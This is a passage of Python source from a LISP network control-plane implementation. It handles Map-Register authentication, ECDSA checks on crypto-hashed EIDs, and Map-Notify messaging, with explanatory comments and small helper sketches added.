    eid_record = lisp_eid_record()
    eid_record.record_ttl = 1440
    eid_record.eid.copy_address(site_eid.eid)
    eid_record.group.copy_address(site_eid.group)
    eid_record.rloc_count = 0
    for rloc_entry in site_eid.registered_rlocs:
        if (rtrs_in_set ^ rloc_entry.is_rtr()): continue
        eid_record.rloc_count += 1
    packet = eid_record.encode()

    #
    # Print the contents of the Map-Notify.
    #
    map_notify.print_notify()
    eid_record.print_record("  ", False)

    #
    # Encode the selected RLOC-records.
    #
    for rloc_entry in site_eid.registered_rlocs:
        if (rtrs_in_set ^ rloc_entry.is_rtr()): continue
        rloc_record = lisp_rloc_record()
        rloc_record.store_rloc_entry(rloc_entry)
        rloc_record.local_bit = True
        rloc_record.probe_bit = False
        rloc_record.reach_bit = True
        packet += rloc_record.encode()
        rloc_record.print_record("    ")

    #
    # Encode the Map-Notify header; multicast Map-Notify messages carry
    # no authentication data.
    #
    packet = map_notify.encode(packet, "")
    if (packet == None): return

    #
    # Send the multicast Map-Notify to the xTR.
    #
    lisp_send_map_notify(lisp_sockets, packet, xtr, LISP_CTRL_PORT)

    #
    # Retransmit until the ITR returns a Map-Notify-Ack.
    #
    map_notify.retransmit_timer = threading.Timer(LISP_MAP_NOTIFY_INTERVAL,
        lisp_retransmit_map_notify, [map_notify])
    map_notify.retransmit_timer.start()
    return
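
# Worked example (added for clarity, not in the original source): the test
# "rtrs_in_set ^ rloc_entry.is_rtr()" above selects exactly one class of
# RLOCs per Map-Notify. Since a true XOR means "skip":
#
#   rtrs_in_set  is_rtr()  XOR    action
#   True         True      False  keep  (RTRs are being announced)
#   True         False     True   skip
#   False        True      True   skip
#   False        False     False  keep  (plain xTR RLOCs announced)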

def lisp_queue_multicast_map_notify(lisp_sockets, rle_list):
    null_group = lisp_address(LISP_AFI_NONE, "", 0, 0)

    for sg in rle_list:
        sg_site_eid = lisp_site_eid_lookup(sg[0], sg[1], True)
        if (sg_site_eid == None): continue

        #
        # Get the registered RLOC-set for the (S,G). If it is empty,
        # collect the RTRs from the merged individual registrations.
        #
        rloc_set = sg_site_eid.registered_rlocs
        if (len(rloc_set) == 0):
            rtrs = {}
            for indiv in list(sg_site_eid.individual_registrations.values()):
                for rloc_entry in indiv.registered_rlocs:
                    if (rloc_entry.is_rtr() == False): continue
                    rtrs[rloc_entry.rloc.print_address()] = rloc_entry
            rloc_set = list(rtrs.values())

        #
        # Build the list of xTRs (or RTRs) to notify. For a (*,G) entry,
        # notify the RLE-nodes that already registered.
        #
        notify_addresses = []
        notify_rtr = False
        if (sg_site_eid.eid.address == 0 and sg_site_eid.eid.mask_len == 0):
            rle_strs = []
            rle_nodes = []
            if (len(rloc_set) != 0 and rloc_set[0].rle != None):
                rle_nodes = rloc_set[0].rle.rle_nodes
            for rle_node in rle_nodes:
                notify_addresses.append(rle_node.address)
                rle_strs.append(rle_node.address.print_address_no_iid())
            lprint("Notify existing RLE-nodes {}".format(rle_strs))
        else:
            #
            # Otherwise notify the RTRs in the registered RLOC-set.
            #
            for rloc_entry in rloc_set:
                if (rloc_entry.is_rtr()):
                    notify_addresses.append(rloc_entry.rloc)

        #
        # If no RTRs registered, notify the ITRs registered for the
        # unicast source EID-prefix.
        #
        notify_rtr = (len(notify_addresses) != 0)
        if (notify_rtr == False):
            itr_site_eid = lisp_site_eid_lookup(sg[0], null_group, False)
            if (itr_site_eid == None): continue

            for rloc_entry in itr_site_eid.registered_rlocs:
                if (rloc_entry.rloc.is_null()): continue
                notify_addresses.append(rloc_entry.rloc)

        if (len(notify_addresses) == 0):
            lprint("No ITRs or RTRs found for {}, Map-Notify suppressed".
                format(green(sg_site_eid.print_eid_tuple(), False)))
            continue

        #
        # Send a multicast Map-Notify to each xTR/RTR found.
        #
        for xtr in notify_addresses:
            lprint("Build Map-Notify to {}TR {} for {}".format(
                "R" if notify_rtr else "x",
                red(xtr.print_address_no_iid(), False),
                green(sg_site_eid.print_eid_tuple(), False)))

            eid_list = [sg_site_eid.print_eid_tuple()]
            lisp_send_multicast_map_notify(lisp_sockets, sg_site_eid,
                eid_list, xtr)
            time.sleep(.001)
    return

def lisp_find_sig_in_rloc_set(packet, rloc_count):
    for i in range(rloc_count):
        rloc_record = lisp_rloc_record()
        packet = rloc_record.decode(packet, None)
        json_sig = rloc_record.json
        if (json_sig == None): continue

        try:
            json_sig = json.loads(json_sig.json_string)
        except:
            lprint("Found corrupted JSON signature")
            continue

        if ("signature" not in json_sig): continue
        return(rloc_record)
    return(None)
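
# Example (assumed shape, based only on the keys this file checks): an
# RLOC-record JSON string that lisp_find_sig_in_rloc_set() would accept
# looks like
#
#   { "signature-eid" : "fd00::1", "signature" : "<base64 data>" }
#
# Only the presence of the "signature" key is tested here; the value is
# validated later by lisp_verify_cga_sig().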

def lisp_get_eid_hash(eid):

    #
    # Find the configured hash prefix covering this EID. A -1 instance-id
    # in the configured prefix acts as a wildcard.
    #
    eid_hash_len = None
    for eid_prefix in lisp_eid_hashes:
        iid = eid_prefix.instance_id
        if (iid == -1): eid_prefix.instance_id = eid.instance_id

        more_specific = eid.is_more_specific(eid_prefix)
        eid_prefix.instance_id = iid
        if (more_specific):
            eid_hash_len = 128 - eid_prefix.mask_len
            break

    if (eid_hash_len == None): return(None)

    #
    # Format the low-order eid_hash_len bits as colon-separated 16-bit
    # groups. "{:x}" formatting avoids the Python 2 hex()[2:-1] idiom,
    # which drops a digit under Python 3.
    #
    address = eid.address
    eid_hash = ""
    for i in range(0, eid_hash_len // 16):
        value = address & 0xffff
        eid_hash = "{:04x}".format(value) + ":" + eid_hash
        address >>= 16

    if (eid_hash_len % 16 != 0):
        value = address & 0xff
        eid_hash = "{:02x}".format(value) + ":" + eid_hash

    return(eid_hash[0:-1])
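
# Worked example (illustrative, assuming fd00::/64 is configured in
# lisp_eid_hashes): eid_hash_len is 128 - 64 = 64 bits, so the low-order
# 64 bits of the EID are rendered as four 16-bit colon groups. An EID of
# fd00::1234:5678:9abc:def0 would hash to "1234:5678:9abc:def0".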

def lisp_lookup_public_key(eid):
    iid = eid.instance_id

    #
    # Get the crypto-hash part of the EID and build the distinguished-name
    # EID "hash-<eid-hash>" used to key the site cache.
    #
    eid_hash = lisp_get_eid_hash(eid)
    if (eid_hash == None): return([None, None, False])

    eid_hash = "hash-" + eid_hash
    hash_eid = lisp_address(LISP_AFI_NAME, eid_hash, len(eid_hash), iid)
    group = lisp_address(LISP_AFI_NONE, "", 0, iid)

    #
    # Do the lookup in the site cache.
    #
    site_eid = lisp_site_eid_lookup(hash_eid, group, True)
    if (site_eid == None): return([hash_eid, None, False])

    #
    # Find the RLOC-record whose JSON string carries the public key.
    #
    pubkey = None
    for rloc_entry in site_eid.registered_rlocs:
        json_pubkey = rloc_entry.json
        if (json_pubkey == None): continue
        try:
            json_pubkey = json.loads(json_pubkey.json_string)
        except:
            lprint("Registered RLOC JSON format is invalid for {}".format(
                eid_hash))
            return([hash_eid, None, False])
        if ("public-key" not in json_pubkey): continue
        pubkey = json_pubkey["public-key"]
        break
    return([hash_eid, pubkey, True])

def lisp_verify_cga_sig(eid, rloc_record):

    #
    # Parse the JSON carried in the RLOC-record.
    #
    sig = json.loads(rloc_record.json.json_string)

    #
    # Use the EID itself if it is a crypto-hashed EID, else use the
    # "signature-eid" named in the JSON.
    #
    if (lisp_get_eid_hash(eid)):
        sig_eid = eid
    elif ("signature-eid" in sig):
        sig_eid_str = sig["signature-eid"]
        sig_eid = lisp_address(LISP_AFI_IPV6, sig_eid_str, 0, 0)
    else:
        lprint("  No signature-eid found in RLOC-record")
        return(False)

    #
    # Look up the public key registered for the crypto-hashed EID.
    #
    hash_eid, pubkey, lookup_good = lisp_lookup_public_key(sig_eid)
    if (hash_eid == None):
        eid_str = green(sig_eid.print_address(), False)
        lprint("  Could not parse hash in EID {}".format(eid_str))
        return(False)

    found = "found" if lookup_good else bold("not found", False)
    eid_str = green(hash_eid.print_address(), False)
    lprint("  Lookup for crypto-hashed EID {} {}".format(eid_str, found))
    if (lookup_good == False): return(False)

    if (pubkey == None):
        lprint("  RLOC-record with public-key not found")
        return(False)

    pubkey_str = pubkey[0:8] + "..." + pubkey[-8:]
    lprint("  RLOC-record with public-key '{}' found".format(pubkey_str))

    #
    # Base64-decode the signature string.
    #
    sig_str = sig["signature"]
    try:
        sig = binascii.a2b_base64(sig_str)
    except:
        lprint("  Incorrect padding in signature string")
        return(False)

    sig_len = len(sig)
    if (sig_len & 1):
        lprint("  Signature length is odd, length {}".format(sig_len))
        return(False)

    #
    # The signed data is the printed signature-EID.
    #
    sig_data = sig_eid.print_address()

    #
    # Load the PEM public key and verify the signature over sig_data.
    #
    pubkey = binascii.a2b_base64(pubkey)
    try:
        key = ecdsa.VerifyingKey.from_pem(pubkey)
    except:
        bad = bold("Bad public-key", False)
        lprint("  {}, not in PEM format".format(bad))
        return(False)

    try:
        good = key.verify(sig, sig_data, hashfunc=hashlib.sha256)
    except:
        lprint("  Signature library failed for signature data '{}'".format(
            sig_data))
        lprint("  Signature used '{}'".format(sig_str))
        return(False)
    return(good)
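
# Signing-side sketch (illustrative; not part of the original source). It
# shows how a signature acceptable to lisp_verify_cga_sig() could be
# produced with the same ecdsa/hashlib/binascii modules used above. The
# helper name and PEM-key argument are assumptions; the verifier only
# requires a base64-encoded SHA-256 ECDSA signature over the printed
# signature-EID.
def _example_sign_signature_eid(signing_key_pem, sig_eid_str):
    sk = ecdsa.SigningKey.from_pem(signing_key_pem)
    # The ecdsa library hashes the message itself; under Python 3 it
    # expects bytes, so the printed EID is encoded first.
    raw = sk.sign(sig_eid_str.encode(), hashfunc=hashlib.sha256)
    return(binascii.b2a_base64(raw))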

def lisp_remove_eid_from_map_notify_queue(eid_list):

    #
    # Find all queued Map-Notify entries covering any EID in eid_list,
    # cancel their retransmit timers, and remember their queue keys.
    #
    keys_to_remove = []
    for eid in eid_list:
        for key in lisp_map_notify_queue:
            map_notify = lisp_map_notify_queue[key]
            if (eid not in map_notify.eid_list): continue

            keys_to_remove.append(key)
            timer = map_notify.retransmit_timer
            if (timer): timer.cancel()

            lprint("Remove from Map-Notify queue nonce 0x{} for EID {}".
                format(map_notify.nonce_key, green(eid, False)))

    #
    # Remove the entries outside the iteration loop.
    #
    for key in keys_to_remove: lisp_map_notify_queue.pop(key)
    return

def lisp_decrypt_map_register(packet):

    #
    # Check the encrypt bit in the first 32 bits of the header; if it is
    # clear, the packet is in the clear.
    #
    header = socket.ntohl(struct.unpack("I", packet[0:4])[0])
    e_bit = (header >> 13) & 0x1
    if (e_bit == 0): return(packet)

    key_id = (header >> 14) & 0x7

    #
    # Select the configured encryption key for this key-id.
    #
    try:
        key = lisp_ms_encryption_keys[key_id]
        key = key.zfill(32)
        iv = "0" * 8
    except:
        lprint("Cannot decrypt Map-Register with key-id {}".format(key_id))
        return(None)

    decrypt = bold("Decrypt", False)
    lprint("{} Map-Register with key-id {}".format(decrypt, key_id))

    #
    # Decrypt everything after the first 4 bytes with chacha.
    #
    plaintext = chacha.ChaCha(key, iv, 20).decrypt(packet[4::])
    return(packet[0:4] + plaintext)
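
# Encryption-side sketch (illustrative; not in the original source): the
# inverse of lisp_decrypt_map_register() above, assuming the bundled chacha
# module offers an encrypt() symmetric to the decrypt() used there. It sets
# the encrypt bit (bit 13) and the 3-bit key-id (bits 14-16) in the first
# network-order long, then encrypts everything after the first 4 bytes.
def _example_encrypt_map_register(packet, key_id):
    key = lisp_ms_encryption_keys[key_id].zfill(32)
    header = socket.ntohl(struct.unpack("I", packet[0:4])[0])
    header |= (1 << 13) | (key_id << 14)
    header = struct.pack("I", socket.htonl(header))
    return(header + chacha.ChaCha(key, "0" * 8, 20).encrypt(packet[4::]))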

def lisp_process_map_register(lisp_sockets, packet, source, sport):
    global lisp_registered_count

    #
    # Decrypt the Map-Register if the sender encrypted it.
    #
    packet = lisp_decrypt_map_register(packet)
    if (packet == None): return

    map_register = lisp_map_register()
    orig_packet, packet = map_register.decode(packet)
    if (packet == None):
        lprint("Could not decode Map-Register packet")
        return

    map_register.sport = sport
    map_register.print_map_register()

    #
    # Decide whether sha1 or sha2 is used for the authentication hash.
    #
    sha1_or_sha2 = True
    if (map_register.auth_len == LISP_SHA1_160_AUTH_DATA_LEN):
        sha1_or_sha2 = True
    if (map_register.alg_id == LISP_SHA_256_128_ALG_ID):
        sha1_or_sha2 = False

    #
    # Multicast entries that get merged are remembered here so one
    # multicast Map-Notify pass can be queued at the end.
    #
    rle_list = []

    #
    # Process each EID-record in the Map-Register message.
    #
    site = None
    eid_records = packet
    eid_list = []
    record_count = map_register.record_count
    for i in range(record_count):
        eid_record = lisp_eid_record()
        rloc_record = lisp_rloc_record()
        packet = eid_record.decode(packet)
        if (packet == None):
            lprint("Could not decode EID-record in Map-Register packet")
            return
        eid_record.print_record("  ", False)

        #
        # Longest-match (non-exact) lookup for the registering prefix.
        #
        site_eid = lisp_site_eid_lookup(eid_record.eid, eid_record.group,
            False)
        match_str = site_eid.print_eid_tuple() if site_eid else None

        #
        # If the matched entry does not accept more-specifics and this is
        # not an exact match, climb to its accept-more-specifics parent.
        #
        if (site_eid and site_eid.accept_more_specifics == False):
            if (site_eid.eid_record_matches(eid_record) == False):
                parent = site_eid.parent_for_more_specifics
                if (parent): site_eid = parent

        #
        # Under an accept-more-specifics parent, create a dynamic entry
        # for the more-specific prefix; otherwise require an exact match.
        #
        ams = (site_eid and site_eid.accept_more_specifics)
        if (ams):
            ms_site_eid = lisp_site_eid(site_eid.site)
            ms_site_eid.dynamic = True
            ms_site_eid.eid.copy_address(eid_record.eid)
            ms_site_eid.group.copy_address(eid_record.group)
            ms_site_eid.parent_for_more_specifics = site_eid
            ms_site_eid.add_cache()
            ms_site_eid.inherit_from_ams_parent()
            site_eid.more_specific_registrations.append(ms_site_eid)
            site_eid = ms_site_eid
        else:
            site_eid = lisp_site_eid_lookup(eid_record.eid, eid_record.group,
                True)

        eid_str = eid_record.print_eid_tuple()

        if (site_eid == None):
            not_found = bold("Site not found", False)
            lprint("  {} for EID {}{}".format(not_found,
                green(eid_str, False),
                ", matched non-ams {}".format(green(match_str, False)) if
                match_str else ""))

            #
            # Skip over the RLOC-records of the unknown EID.
            #
            packet = rloc_record.end_of_rlocs(packet, eid_record.rloc_count)
            if (packet == None):
                lprint("  Could not decode RLOC-record in Map-Register packet")
                return
            continue

        site = site_eid.site

        if (ams):
            e = site_eid.parent_for_more_specifics.print_eid_tuple()
            lprint("  Found ams {} for site '{}' for registering prefix {}".
                format(green(e, False), site.site_name,
                green(eid_str, False)))
        else:
            e = green(site_eid.print_eid_tuple(), False)
            lprint("  Found {} for site '{}' for registering prefix {}".
                format(e, site.site_name, green(eid_str, False)))

        #
        # Reject registrations for sites in admin-shutdown state.
        #
        if (site.shutdown):
            lprint(("  Rejecting registration for site '{}', configured in " +
                "admin-shutdown state").format(site.site_name))
            packet = rloc_record.end_of_rlocs(packet, eid_record.rloc_count)
            continue

        #
        # Verify the authentication hash with the site's configured key.
        #
        key_id = map_register.key_id
        if (key_id in site.auth_key):
            password = site.auth_key[key_id]
        else:
            password = ""

        auth_good = lisp_verify_auth(orig_packet, map_register.alg_id,
            map_register.auth_data, password)
        dynamic = "dynamic " if site_eid.dynamic else ""

        passfail = bold("passed" if auth_good else "failed", False)
        key_id_str = ("key-id {}".format(key_id) if key_id ==
            map_register.key_id else
            "bad key-id {}".format(map_register.key_id))
        lprint("  Authentication {} for {}EID-prefix {}, {}".format(passfail,
            dynamic, green(eid_str, False), key_id_str))

        #
        # For crypto-hashed EIDs (or when the site requires it), verify
        # the signature carried in one of the RLOC-records.
        #
        sig_good = True
        is_crypto_eid = (lisp_get_eid_hash(eid_record.eid) != None)
        if (is_crypto_eid or site_eid.require_signature):
            required = "Required " if site_eid.require_signature else ""
            eid_str = green(eid_str, False)
            sig_rloc_record = lisp_find_sig_in_rloc_set(packet,
                eid_record.rloc_count)
            if (sig_rloc_record == None):
                sig_good = False
                lprint(("  {}EID-crypto-hash signature verification {} " +
                    "for EID-prefix {}, no signature found").format(required,
                    bold("failed", False), eid_str))
            else:
                sig_good = lisp_verify_cga_sig(eid_record.eid,
                    sig_rloc_record)
                passfail = bold("passed" if sig_good else "failed", False)
                lprint(("  {}EID-crypto-hash signature verification {} " +
                    "for EID-prefix {}").format(required, passfail, eid_str))

        if (auth_good == False or sig_good == False):
            packet = rloc_record.end_of_rlocs(packet, eid_record.rloc_count)
            if (packet == None):
                lprint("  Could not decode RLOC-record in Map-Register packet")
                return
            continue

        #
        # For merged registrations, keep per-xTR state under the parent
        # entry, keyed by xtr-id.
        #
        if (map_register.merge_register_requested):
            parent = site_eid
            parent.inconsistent_registration = False

            #
            # A site-id change invalidates all merged unicast state.
            #
            if (site_eid.group.is_null()):
                if (parent.site_id != map_register.site_id):
                    parent.site_id = map_register.site_id
                    parent.registered = False
                    parent.individual_registrations = {}
                    parent.registered_rlocs = []
                    lisp_registered_count -= 1

            xtr_id = map_register.xtr_id
            if (xtr_id in site_eid.individual_registrations):
                site_eid = site_eid.individual_registrations[xtr_id]
            else:
                site_eid = lisp_site_eid(site)
                site_eid.eid.copy_address(parent.eid)
                site_eid.group.copy_address(parent.group)
                site_eid.encrypt_json = parent.encrypt_json
                parent.individual_registrations[xtr_id] = site_eid
        else:
            site_eid.inconsistent_registration = \
                site_eid.merge_register_requested

        site_eid.map_registers_received += 1

        #
        # Ignore a deregistration (TTL 0) from an RLOC that is not in the
        # currently registered RLOC-set.
        #
        bad = (site_eid.is_rloc_in_rloc_set(source) == False)
        if (eid_record.record_ttl == 0 and bad):
            lprint("  Ignore deregistration request from {}".format(
                red(source.print_address_no_iid(), False)))
            continue

        #
        # Save the old RLOC-set and build the new one from the packet.
        #
        old_rloc_set = site_eid.registered_rlocs
        site_eid.registered_rlocs = []

        rloc_records = packet
        for j in range(eid_record.rloc_count):
            rloc_record = lisp_rloc_record()
            packet = rloc_record.decode(packet, None, site_eid.encrypt_json)
            if (packet == None):
                lprint("  Could not decode RLOC-record in Map-Register packet")
                return
            rloc_record.print_record("    ")

            #
            # Enforce the site's configured allowed RLOC-set, if any.
            #
            if (len(site.allowed_rlocs) > 0):
                addr_str = rloc_record.rloc.print_address()
                if (addr_str not in site.allowed_rlocs):
                    lprint(("  Reject registration, RLOC {} not " +
                        "configured in allowed RLOC-set").format(
                        red(addr_str, False)))
                    site_eid.registered = False
                    packet = rloc_record.end_of_rlocs(packet,
                        eid_record.rloc_count - j - 1)
                    break

            #
            # Store the RLOC in the registered RLOC-set.
            #
            rloc = lisp_rloc()
            rloc.store_rloc_from_record(rloc_record, None, source)

            #
            # Only the Map-Register source gets Map-Notify messages.
            #
            if (source.is_exact_match(rloc.rloc)):
                rloc.map_notify_requested = map_register.map_notify_requested

            site_eid.registered_rlocs.append(rloc)

        rloc_set_change = (site_eid.do_rloc_sets_match(old_rloc_set) == False)

        #
        # A refreshing registration may not change the RLOC-set.
        #
        if (map_register.map_register_refresh and rloc_set_change and
            site_eid.registered):
            lprint("  Reject registration, refreshes cannot change RLOC-set")
            site_eid.registered_rlocs = old_rloc_set
            continue

        #
        # Timestamp the registration.
        #
        if (site_eid.registered == False):
            site_eid.first_registered = lisp_get_timestamp()
            lisp_registered_count += 1

        site_eid.last_registered = lisp_get_timestamp()
        site_eid.registered = (eid_record.record_ttl != 0)
        site_eid.last_registerer = source

        #
        # Save the flags the registerer requested.
        #
        site_eid.auth_sha1_or_sha2 = sha1_or_sha2
        site_eid.proxy_reply_requested = map_register.proxy_reply_requested
        site_eid.lisp_sec_present = map_register.lisp_sec_present
        site_eid.map_notify_requested = map_register.map_notify_requested
        site_eid.mobile_node_requested = map_register.mobile_node
        site_eid.merge_register_requested = \
            map_register.merge_register_requested
        site_eid.use_register_ttl_requested = map_register.use_ttl_for_timeout
        if (site_eid.use_register_ttl_requested):
            site_eid.register_ttl = eid_record.store_ttl()
        else:
            site_eid.register_ttl = LISP_SITE_TIMEOUT_CHECK_INTERVAL * 3
        site_eid.xtr_id_present = map_register.xtr_id_present
        if (site_eid.xtr_id_present):
            site_eid.xtr_id = map_register.xtr_id
            site_eid.site_id = map_register.site_id

        #
        # Merge this xTR's registration into the parent entry and ack it
        # if the xTR asked for a Map-Notify.
        #
        if (map_register.merge_register_requested):
            if (parent.merge_in_site_eid(site_eid)):
                rle_list.append([eid_record.eid, eid_record.group])
            if (map_register.map_notify_requested):
                lisp_send_merged_map_notify(lisp_sockets, parent,
                    map_register, eid_record)

        if (rloc_set_change == False): continue
        if (len(rle_list) != 0): continue

        eid_list.append(site_eid.print_eid_tuple())

        #
        # The RLOC-set changed: Map-Notify the old RLOC-set, then notify
        # any pubsub subscribers.
        #
        eid_record_copy = copy.deepcopy(eid_record)
        eid_record_packet = eid_record.encode()
        eid_record_packet += rloc_records

        notify_eid_list = [site_eid.print_eid_tuple()]
        lprint("  Changed RLOC-set, Map-Notifying old RLOC-set")

        for rloc in old_rloc_set:
            if (rloc.map_notify_requested == False): continue
            if (rloc.rloc.is_exact_match(source)): continue
            lisp_build_map_notify(lisp_sockets, eid_record_packet,
                notify_eid_list, 1, rloc.rloc, LISP_CTRL_PORT,
                map_register.nonce, map_register.key_id, map_register.alg_id,
                map_register.auth_len, site, False)

        lisp_notify_subscribers(lisp_sockets, eid_record_copy, rloc_records,
            site_eid.eid, site)

    #
    # Queue one multicast Map-Notify pass for the merged entries.
    #
    if (len(rle_list) != 0):
        lisp_queue_multicast_map_notify(lisp_sockets, rle_list)

    #
    # Individual merged registrations were acked above.
    #
    if (map_register.merge_register_requested): return

    #
    # Ack the whole Map-Register with a Map-Notify if one was requested.
    #
    if (map_register.map_notify_requested and site != None):
        lisp_build_map_notify(lisp_sockets, eid_records, eid_list,
            map_register.record_count, source, sport, map_register.nonce,
            map_register.key_id, map_register.alg_id, map_register.auth_len,
            site, True)
    return
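
# Processing summary (added commentary): lisp_process_map_register()
# 1. decrypts the Map-Register if its encrypt bit is set,
# 2. longest-matches each EID-record against configured site entries,
#    creating dynamic entries under accept-more-specifics parents,
# 3. authenticates against the site key and, for crypto-EIDs, verifies
#    the signature found in the RLOC-set,
# 4. rebuilds the registered RLOC-set, enforcing allowed-RLOC and
#    refresh restrictions, and
# 5. emits Map-Notify messages as requested: merged, multicast-queued,
#    to the old RLOC-set on change, or a plain ack.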

def lisp_process_unicast_map_notify(lisp_sockets, packet, source):
    map_notify = lisp_map_notify("")
    packet = map_notify.decode(packet)
    if (packet == None):
        lprint("Could not decode Map-Notify packet")
        return

    map_notify.print_notify()
    if (map_notify.record_count == 0): return

    eid_records = map_notify.eid_records

    for i in range(map_notify.record_count):
        eid_record = lisp_eid_record()
        eid_records = eid_record.decode(eid_records)
        if (eid_records == None): return
        eid_record.print_record("  ", False)
        eid_str = eid_record.print_eid_tuple()

        #
        # Only accept Map-Notifies for entries we subscribed to.
        #
        mc = lisp_map_cache_lookup(eid_record.eid, eid_record.eid)
        if (mc == None):
            e = green(eid_str, False)
            lprint("Ignoring Map-Notify EID {}, no subscribe-request entry".
                format(e))
            continue

        if (mc.action != LISP_SEND_PUBSUB_ACTION):
            if (mc.subscribed_eid == None):
                e = green(eid_str, False)
                lprint("Ignoring Map-Notify for non-subscribed EID {}".
                    format(e))
                continue

        #
        # Replace a pubsub placeholder with a real map-cache entry; for an
        # existing entry, save the old RLOC-set so its state can be reused.
        #
        old_rloc_set = []
        if (mc.action == LISP_SEND_PUBSUB_ACTION):
            mc = lisp_mapping(eid_record.eid, eid_record.group, [])
            mc.add_cache()
            subscribed_eid = copy.deepcopy(eid_record.eid)
            subscribed_group = copy.deepcopy(eid_record.group)
        else:
            subscribed_eid = mc.subscribed_eid
            subscribed_group = mc.subscribed_group
            old_rloc_set = mc.rloc_set
            mc.delete_rlocs_from_rloc_probe_list()
            mc.rloc_set = []

        mc.mapping_source = None if source == "lisp-itr" else source
        mc.map_cache_ttl = eid_record.store_ttl()
        mc.subscribed_eid = subscribed_eid
        mc.subscribed_group = subscribed_group

        #
        # An empty RLOC-set in the Map-Notify clears the entry.
        #
        if (len(old_rloc_set) != 0 and eid_record.rloc_count == 0):
            mc.build_best_rloc_set()
            lisp_write_ipc_map_cache(True, mc)
            lprint("Update {} map-cache entry with no RLOC-set".format(
                green(eid_str, False)))
            continue

        #
        # Build the new RLOC-set, reusing state for RLOCs we already had.
        #
        new_count = replaced_count = 0
        for j in range(eid_record.rloc_count):
            rloc_record = lisp_rloc_record()
            eid_records = rloc_record.decode(eid_records, None)
            rloc_record.print_record("    ")

            found = False
            for rloc_entry in old_rloc_set:
                if (rloc_entry.rloc.is_exact_match(rloc_record.rloc)):
                    found = True
                    break

            if (found):
                rloc = copy.deepcopy(rloc_entry)
                replaced_count += 1
            else:
                rloc = lisp_rloc()
                new_count += 1

            rloc.store_rloc_from_record(rloc_record, None, mc.mapping_source)
            mc.rloc_set.append(rloc)

        lprint("Update {} map-cache entry with {}/{} new/replaced RLOCs".
            format(green(eid_str, False), new_count, replaced_count))

        #
        # Write the updated entry to the map-cache.
        #
        mc.build_best_rloc_set()
        lisp_write_ipc_map_cache(True, mc)

    #
    # Ack the Map-Notify back to the map-server it came from.
    #
    ms = lisp_get_map_server(source)
    if (ms == None):
        lprint("Cannot find Map-Server for Map-Notify source address {}".
            format(source.print_address_no_iid()))
        return
    lisp_send_map_notify_ack(lisp_sockets, eid_records, map_notify, ms)

def lisp_process_multicast_map_notify(packet, source):
    map_notify = lisp_map_notify("")
    packet = map_notify.decode(packet)
    if (packet == None):
        lprint("Could not decode Map-Notify packet")
        return

    map_notify.print_notify()
    if (map_notify.record_count == 0): return

    eid_records = map_notify.eid_records

    for i in range(map_notify.record_count):
        eid_record = lisp_eid_record()
        eid_records = eid_record.decode(eid_records)
        if (eid_records == None): return
        eid_record.print_record("  ", False)

        #
        # Find the (S,G) in the map-cache; create an entry when gleaning
        # is allowed for it.
        #
        mc = lisp_map_cache_lookup(eid_record.eid, eid_record.group)
        if (mc == None):
            allow, x, y = lisp_allow_gleaning(eid_record.eid,
                eid_record.group, None)
            if (allow == False): continue

            mc = lisp_mapping(eid_record.eid, eid_record.group, [])
            mc.add_cache()

        #
        # Gleaned entries are controlled by data-plane learning, not by
        # Map-Notify messages.
        #
        if (mc.gleaned):
            lprint("Ignore Map-Notify for gleaned {}".format(
                green(mc.print_eid_tuple(), False)))
            continue

        mc.mapping_source = None if source == "lisp-etr" else source
        mc.map_cache_ttl = eid_record.store_ttl()

        #
        # An empty RLOC-set in the Map-Notify clears the entry.
        #
        if (len(mc.rloc_set) != 0 and eid_record.rloc_count == 0):
            mc.rloc_set = []
            mc.build_best_rloc_set()
            lisp_write_ipc_map_cache(True, mc)
            lprint("Update {} map-cache entry with no RLOC-set".format(
                green(mc.print_eid_tuple(), False)))
            continue

        rtrs_in_set = mc.rtrs_in_rloc_set()

        #
        # Store the RLE from the RLOC-records that carry one, keeping the
        # packet statistics of the old RLOC-set.
        #
        for j in range(eid_record.rloc_count):
            rloc_record = lisp_rloc_record()
            eid_records = rloc_record.decode(eid_records, None)
            rloc_record.print_record("    ")
            if (eid_record.group.is_null()): continue
            if (rloc_record.rle == None): continue

            stats = mc.rloc_set[0].stats if len(mc.rloc_set) != 0 else None

            rloc = lisp_rloc()
            rloc.store_rloc_from_record(rloc_record, None, mc.mapping_source)
            if (stats != None): rloc.stats = copy.deepcopy(stats)

            if (rtrs_in_set and rloc.is_rtr() == False): continue

            mc.rloc_set = [rloc]
            mc.build_best_rloc_set()
            lisp_write_ipc_map_cache(True, mc)

            lprint("Update {} map-cache entry with RLE {}".format(
                green(mc.print_eid_tuple(), False),
                rloc.rle.print_rle(False, True)))
    return

def lisp_process_map_notify(lisp_sockets, orig_packet, source):
    map_notify = lisp_map_notify("")
    packet = map_notify.decode(orig_packet)
    if (packet == None):
        lprint("Could not decode Map-Notify packet")
        return

    map_notify.print_notify()

    #
    # If authentication data is present, find the map-server this message
    # came from and verify it with the map-server's password.
    #
    addr_str = source.print_address()
    if (map_notify.alg_id != 0 or map_notify.auth_len != 0):
        ms = None
        for key in lisp_map_servers_list:
            if (key.find(addr_str) == -1): continue
            ms = lisp_map_servers_list[key]
        if (ms == None):
            lprint(("  Could not find Map-Server {} to authenticate " +
                "Map-Notify").format(addr_str))
            return

        ms.map_notifies_received += 1

        auth_good = lisp_verify_auth(packet, map_notify.alg_id,
            map_notify.auth_data, ms.password)

        lprint("  Authentication {} for Map-Notify".format(
            "succeeded" if auth_good else "failed"))
        if (auth_good == False): return
    else:
        ms = lisp_ms(addr_str, None, "", 0, "", False, False, False, False,
            0, 0, 0, None)

    #
    # A Map-Notify with no EID-records is simply acked.
    #
    eid_records = map_notify.eid_records
    if (map_notify.record_count == 0):
        lisp_send_map_notify_ack(lisp_sockets, eid_records, map_notify, ms)
        return

    #
    # Decode the EID-record and its RLOC-records so they can be printed
    # and the multicast group found.
    #
    eid_record = lisp_eid_record()
    packet = eid_record.decode(eid_records)
    if (packet == None): return

    eid_record.print_record("  ", False)

    for j in range(eid_record.rloc_count):
        rloc_record = lisp_rloc_record()
        packet = rloc_record.decode(packet, None)
        if (packet == None):
            lprint("  Could not decode RLOC-record in Map-Notify packet")
            return
        rloc_record.print_record("    ")

    #
    # For a multicast EID-record, pass the Map-Notify to the lisp-itr
    # process so it can update its map-cache.
    #
    if (eid_record.group.is_null() == False):
        lprint("Send {} Map-Notify IPC message to ITR process".format(
            green(eid_record.print_eid_tuple(), False)))

        ipc = lisp_control_packet_ipc(orig_packet, addr_str, "lisp-itr", 0)
        lisp_ipc(ipc, lisp_sockets[2], "lisp-core-pkt")

    #
    # Ack the Map-Notify.
    #
    lisp_send_map_notify_ack(lisp_sockets, eid_records, map_notify, ms)
    return
